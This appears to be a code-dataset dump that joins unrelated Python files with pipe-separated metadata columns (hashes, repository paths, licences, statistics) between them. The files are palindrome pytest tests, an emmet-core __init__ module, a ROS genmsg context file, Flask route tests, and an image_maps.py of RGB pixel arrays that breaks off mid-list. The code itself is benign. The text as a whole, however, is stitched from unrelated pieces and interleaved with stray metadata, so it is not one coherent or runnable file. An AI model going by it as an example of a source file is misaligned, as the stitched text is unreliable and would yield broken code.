    # make the duration assertion flaky; perf_counter() is the right tool here.
    start = perf_counter()
    assert Solution().longestPalindromeBruteForce(test_input) == expected
    duration = (perf_counter() - start) * 1000  # Duration in ms
    assert duration < threshold, "Expecting duration to be < %s ms" % threshold
@pytest.mark.parametrize("test_input, expected", [
("babad", "bab"),
("cbbd", "bb"),
("", ""),
("a", "a"),
("ab", "a"),
("abc", "a"),
("abcdd", "dd"),
("aaabaaaa", "aaabaaa"),
("salas", "salas"),
("psalas", "salas"),
("peter salas", "salas"),
("abcdefghijklmnopqrstuvwxyz", "a"),
("abcdefghijklmmnopqrstuvwxyz", "mm"),
("abcdefghijklmnopqrstuvwxyzz", "zz"),
("abcdefghijklmnopqrstuvwxyzzz", "zzz"),
("kztakrekvefgchersuoiuatzlmwynzjhdqqftjcqmntoyckqfawikkdrnfgbwtdpbkymvwoumurjdzygyzsbmwzpcxcdmmpwzmeibligwiiqbecxwyxigikoewwrczkanwwqukszsbjukzumzladrvjefpegyicsgctdvldetuegxwihdtitqrdmygdrsweahfrepdcudvyvrggbkthztxwicyzazjyeztytwiyybqdsczozvtegodacdokczfmwqfmyuixbeeqluqcqwxpyrkpfcdosttzooykpvdykfxulttvvwnzftndvhsvpgrgdzsvfxdtzztdiswgwxzvbpsjlizlfrlgvlnwbjwbujafjaedivvgnbgwcdbzbdbprqrflfhahsvlcekeyqueyxjfetkxpapbeejoxwxlgepmxzowldsmqllpzeymakcshfzkvyykwljeltutdmrhxcbzizihzinywggzjctzasvefcxmhnusdvlderconvaisaetcdldeveeemhugipfzbhrwidcjpfrumshbdofchpgcsbkvaexfmenpsuodatxjavoszcitjewflejjmsuvyuyrkumednsfkbgvbqxfphfqeqozcnabmtedffvzwbgbzbfydiyaevoqtfmzxaujdydtjftapkpdhnbmrylcibzuqqynvnsihmyxdcrfftkuoymzoxpnashaderlosnkxbhamkkxfhwjsyehkmblhppbyspmcwuoguptliashefdklokjpggfiixozsrlwmeksmzdcvipgkwxwynzsvxnqtchgwwadqybkguscfyrbyxudzrxacoplmcqcsmkraimfwbauvytkxdnglwfuvehpxd", "dtzztd"),
("iptmykvjanwiihepqhzupneckpzomgvzmyoybzfynybpfybngttozprjbupciuinpzryritfmyxyppxigitnemanreexcpwscvcwddnfjswgprabdggbgcillisyoskdodzlpbltefiz", "illi"),
])
def test_palindrome_optimized(test_input, expected):
    """Check the optimized longest-palindrome result and that it finishes within the (tight) time budget."""
    from time import perf_counter  # monotonic, high-resolution clock for durations
    threshold = 5  # ms
    # time.time() is wall-clock and can jump (e.g. NTP adjustments), which would
    # make the duration assertion flaky; perf_counter() is the right tool here.
    start = perf_counter()
    assert Solution().longestPalindrome(test_input) == expected
    duration = (perf_counter() - start) * 1000  # Duration in ms
    assert duration < threshold, "Expecting duration to be < %s ms" % threshold
| 52.5
| 895
| 0.799499
| 199
| 3,990
| 15.964824
| 0.396985
| 0.016997
| 0.032106
| 0.015738
| 0.871262
| 0.871262
| 0.871262
| 0.871262
| 0.871262
| 0.871262
| 0
| 0.004479
| 0.104762
| 3,990
| 75
| 896
| 53.2
| 0.884938
| 0.070426
| 0
| 0.830189
| 0
| 0
| 0.68973
| 0.607568
| 0
| 1
| 0
| 0
| 0.075472
| 1
| 0.037736
| false
| 0
| 0.056604
| 0
| 0.09434
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
38f00c5ed31455c33a91eb5aaddc041d5e21a125
| 292
|
py
|
Python
|
emmet-core/emmet/core/vasp/calc_types/__init__.py
|
nwinner/emmet
|
6bd779ba785a84f57b61954c88d1ed0dfa95b8cb
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
emmet-core/emmet/core/vasp/calc_types/__init__.py
|
nwinner/emmet
|
6bd779ba785a84f57b61954c88d1ed0dfa95b8cb
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
emmet-core/emmet/core/vasp/calc_types/__init__.py
|
nwinner/emmet
|
6bd779ba785a84f57b61954c88d1ed0dfa95b8cb
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from pathlib import Path

# The enums module appears to be generated: if importing it fails, import the
# generator module instead (presumably producing enums as a side effect, so the
# subsequent import succeeds — TODO confirm against the generate module).
try:
    import emmet.core.vasp.calc_types.enums
except ImportError:
    import emmet.core.vasp.calc_types.generate
from emmet.core.vasp.calc_types.enums import RunType, TaskType, CalcType
from emmet.core.vasp.calc_types.utils import run_type, task_type, calc_type
| 29.2
| 75
| 0.811644
| 46
| 292
| 5
| 0.456522
| 0.156522
| 0.226087
| 0.295652
| 0.513043
| 0.513043
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113014
| 292
| 9
| 76
| 32.444444
| 0.888031
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac40e55b44d5dfcbb72a2094c91a0f12f8219621
| 1,892
|
py
|
Python
|
build/geographic_info/geographic_msgs/cmake/geographic_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
build/geographic_info/geographic_msgs/cmake/geographic_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
build/geographic_info/geographic_msgs/cmake/geographic_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
# NOTE: auto-generated build context consumed by the genmsg CMake machinery;
# do not edit by hand — regenerate via the build instead.
# Semicolon-separated list of .msg files for this package.
messages_str = "/workspace/src/geographic_info/geographic_msgs/msg/BoundingBox.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeographicMapChanges.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeographicMap.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPath.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPoint.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPointStamped.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPose.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPoseStamped.msg;/workspace/src/geographic_info/geographic_msgs/msg/KeyValue.msg;/workspace/src/geographic_info/geographic_msgs/msg/MapFeature.msg;/workspace/src/geographic_info/geographic_msgs/msg/RouteNetwork.msg;/workspace/src/geographic_info/geographic_msgs/msg/RoutePath.msg;/workspace/src/geographic_info/geographic_msgs/msg/RouteSegment.msg;/workspace/src/geographic_info/geographic_msgs/msg/WayPoint.msg"
# Semicolon-separated list of .srv files for this package.
services_str = "/workspace/src/geographic_info/geographic_msgs/srv/GetGeographicMap.srv;/workspace/src/geographic_info/geographic_msgs/srv/GetGeoPath.srv;/workspace/src/geographic_info/geographic_msgs/srv/GetRoutePlan.srv;/workspace/src/geographic_info/geographic_msgs/srv/UpdateGeographicMap.srv"
pkg_name = "geographic_msgs"
# Message packages this package's messages depend on.
dependencies_str = "geometry_msgs;std_msgs;uuid_msgs"
# Code generators to run for each message/service.
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
# Alternating package-name;msg-include-path pairs for dependency resolution.
dep_include_paths_str = "geographic_msgs;/workspace/src/geographic_info/geographic_msgs/msg;geometry_msgs;/opt/ros/melodic/share/geometry_msgs/cmake/../msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg;uuid_msgs;/workspace/src/unique_identifier/uuid_msgs/msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
# '' == 'TRUE' evaluates to False here: the template substituted an empty flag.
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 157.666667
| 954
| 0.853066
| 260
| 1,892
| 5.953846
| 0.269231
| 0.189922
| 0.270026
| 0.319121
| 0.591085
| 0.562662
| 0.562662
| 0.475452
| 0
| 0
| 0
| 0.000538
| 0.01797
| 1,892
| 11
| 955
| 172
| 0.832616
| 0.025899
| 0
| 0
| 1
| 0.333333
| 0.889734
| 0.870722
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac74490696d806dc0200c067ef165426b936706f
| 1,524
|
py
|
Python
|
tests/endpoints/test_base_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
tests/endpoints/test_base_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
tests/endpoints/test_base_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
def test_landing_page(client, captured_templates):
    """
    GIVEN a Flask application configured for testing (client)
    WHEN the '/' route is requested (GET)
    THEN there should be the correct `status_code`, `template.name`,
         and the correct `page_title` in the context
    """
    # Simulate a browser issuing GET / against the test client.
    response = client.get("/")
    # The request must succeed.
    assert response.status_code == 200
    # Exactly one template should have been rendered, and it must be
    # the landing page with the expected title in its context.
    assert len(captured_templates) == 1
    rendered_template, render_context = captured_templates[0]
    assert rendered_template.name == "landing_page.html"
    assert "page_title" in render_context
    assert render_context["page_title"] == "Help & Help"
def test_get_started(client, captured_templates):
    """
    GIVEN a Flask application configured for testing (client)
    WHEN the '/get_started' route is requested (GET)
    THEN there should be the correct `status_code`, `template.name`,
         and the correct `page_title` in the context
    """
    # Simulate a browser issuing GET /get_started against the test client.
    response = client.get("/get_started")
    # The request must succeed.
    assert response.status_code == 200
    # Exactly one template should have been rendered, and it must be
    # the get-started page with the expected title in its context.
    assert len(captured_templates) == 1
    rendered_template, render_context = captured_templates[0]
    assert rendered_template.name == "get_started.html"
    assert "page_title" in render_context
    assert render_context["page_title"] == "Get Started"
| 29.882353
| 68
| 0.686352
| 206
| 1,524
| 4.961165
| 0.26699
| 0.099804
| 0.043053
| 0.054795
| 0.908023
| 0.908023
| 0.908023
| 0.908023
| 0.908023
| 0.908023
| 0
| 0.008453
| 0.223753
| 1,524
| 50
| 69
| 30.48
| 0.855452
| 0.474409
| 0
| 0.5
| 0
| 0
| 0.145749
| 0
| 0
| 0
| 0
| 0
| 0.625
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac8a2776e7429687f1f16206dcb2f574e7140266
| 34,454
|
py
|
Python
|
build-files/server-code/IoT/image_maps.py
|
emerginganalytics/ualr-cyber-gym
|
1156bc2c85c17af02da048f40b2be875f89db0ce
|
[
"MIT"
] | 3
|
2020-09-02T19:18:03.000Z
|
2021-04-29T20:23:01.000Z
|
build-files/server-code/IoT/image_maps.py
|
emerginganalytics/ualr-cyber-gym
|
1156bc2c85c17af02da048f40b2be875f89db0ce
|
[
"MIT"
] | 26
|
2021-12-23T19:37:27.000Z
|
2022-03-28T04:03:41.000Z
|
build-files/server-code/IoT/image_maps.py
|
emerginganalytics/cyberarena
|
311d179a30017285571f65752eaa91b78c7097aa
|
[
"MIT"
] | 4
|
2020-11-20T20:38:49.000Z
|
2021-04-29T20:23:12.000Z
|
ImageMaps = {'heart': [[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 1, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 0, 0], [120, 7, 120], [232, 25, 232], [0, 0, 0], [0, 0, 0], [232, 25, 232], [120, 7, 120], [0, 0, 0], [232, 25, 232], [232, 25, 232], [194, 29, 194], [232, 25, 232], [232, 25, 232], [194, 29, 194], [232, 25, 232], [233, 25, 232], [120, 7, 120], [194, 29, 194], [232, 25, 232], [232, 24, 233], [232, 25, 232], [232, 25, 232], [194, 29, 194], [120, 7, 121], [0, 0, 0], [120, 7, 120], [194, 29, 194], [232, 24, 232], [232, 25, 232], [194, 29, 194], [120, 7, 120], [0, 1, 0], [0, 0, 0], [0, 0, 0], [120, 7, 120], [194, 29, 194], [194, 29, 194], [120, 7, 120], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 1, 0], [0, 0, 0], [232, 24, 232], [232, 25, 232], [0, 0, 0], [0, 0, 0], [0, 1, 1], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1]]], 'heartrate': [[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 
24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 
0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 
0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 
0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 
0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], 